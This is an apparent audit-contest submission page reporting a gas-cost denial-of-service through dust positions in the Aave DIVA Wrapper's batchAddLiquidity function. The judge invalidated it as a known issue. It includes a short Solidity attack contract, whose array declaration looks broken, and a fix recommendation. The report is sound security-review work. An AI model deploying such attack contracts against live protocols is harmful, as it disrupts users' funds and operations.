Aave DIVA Wrapper

DIVA

HardhatDeFi

15,000 USDC

View results

Previous Next

Submission Details

Severity: medium

Invalid

"Dust positions" causing a Gas Cost Denial of Service.

suitec9

Summary

A vulnerability in the batchAddLiquidity() function allows an attacker to create numerous dust positions, potentially causing a Gas Cost Denial of Service (DoS) and creating accounting complexities.

Vulnerability Details

function batchAddLiquidity(AddLiquidityArgs[] calldata _addLiquidityArgs) external override nonReentrant {

// No minimum amount check

for (uint256 i = 0; i < _length; i++) {

_addLiquidity(

_addLiquidityArgs[i].poolId,

_addLiquidityArgs[i].collateralAmount, // Can be very small amounts

_addLiquidityArgs[i].longRecipient,

_addLiquidityArgs[i].shortRecipient

);

}

Key issues:

No minimum collateral amount check
Ability to create multiple tiny positions in a single batch
No limit on the number of positions that can be created

Impact

Gas Cost DoS: Removing liquidity becomes economically unfeasible due to high gas costs
Fee Collection Issues: Very small positions may result in zero fees
Accounting Complexity: Increased overhead in tracking and managing positions

Proof of Concept

// Attack contract

contract DustAttack {

AaveDIVAWrapper wrapper;

function attack(bytes32 poolId) external {

// Create array of 100 tiny positions

AddLiquidityArgs[] memory args = new AddLiquidityArgs[]();

for(uint i = 0; i < 100; i++) {

args[i] = AddLiquidityArgs({

poolId: poolId,

collateralAmount: 1, // Dust amount

longRecipient: address(this),

shortRecipient: address(this)

});

}

wrapper.batchAddLiquidity(args);

}

Tools Used

Solidity Static Analysis
Manual Code Review
Foundry Framework (for potential testing)

Recommendations

function _addLiquidity(

bytes32 _poolId,

uint256 _collateralAmount,

address _longRecipient,

address _shortRecipient

) internal {

// Add minimum amount check

if(_collateralAmount < MINIMUM_COLLATERAL_AMOUNT) {

revert CollateralAmountTooLow();

}

// Rest of function...

}

Specific recommendations:

Implement a minimum collateral amount check
Limit the number of positions that can be created in a single batch
Add gas-efficient mechanisms for position management
Implement proper fee calculation for small positions

Updates

Lead Judging Commences

bube Lead Judge 5 months ago

Submission Judgement Published

Invalidated

Reason: Known issue

Prize pool breakdown

Total prize

15,000 USDC

nSLOC

519

29 USDC / LOC

High Medium

14,000

Low

1,000

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.